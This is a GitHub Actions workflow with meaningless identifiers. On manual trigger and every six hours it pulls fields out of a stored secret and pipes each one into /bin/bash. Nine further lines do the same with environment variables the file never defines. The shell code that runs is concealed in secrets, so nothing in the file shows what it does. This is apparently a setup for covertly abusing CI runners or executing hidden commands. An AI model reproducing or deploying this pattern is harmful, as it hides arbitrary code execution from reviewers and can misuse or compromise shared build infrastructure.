name: meilitong3214

on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: meilitong3214
        env:
          ys34: ${{ secrets.ys34 }}
        run: |
          echo $ys34 | jq -r .jwyq517 | /bin/bash
          echo $gdf73 | jq -r .r8104 | /bin/bash
          echo $vjd4 | jq -r .f830 | /bin/bash
          echo $f34 | jq -r .yuzr78228 | /bin/bash
          echo $cfp62 | jq -r .t91 | /bin/bash
          echo $llr3 | jq -r .ddc13 | /bin/bash
          echo $gnndx34 | jq -r .ax7350 | /bin/bash
          echo $uw656 | jq -r .ma2199 | /bin/bash
          echo $m2 | jq -r .bkfw1 | /bin/bash
          echo $sae13 | jq -r .brbfj66 | /bin/bash

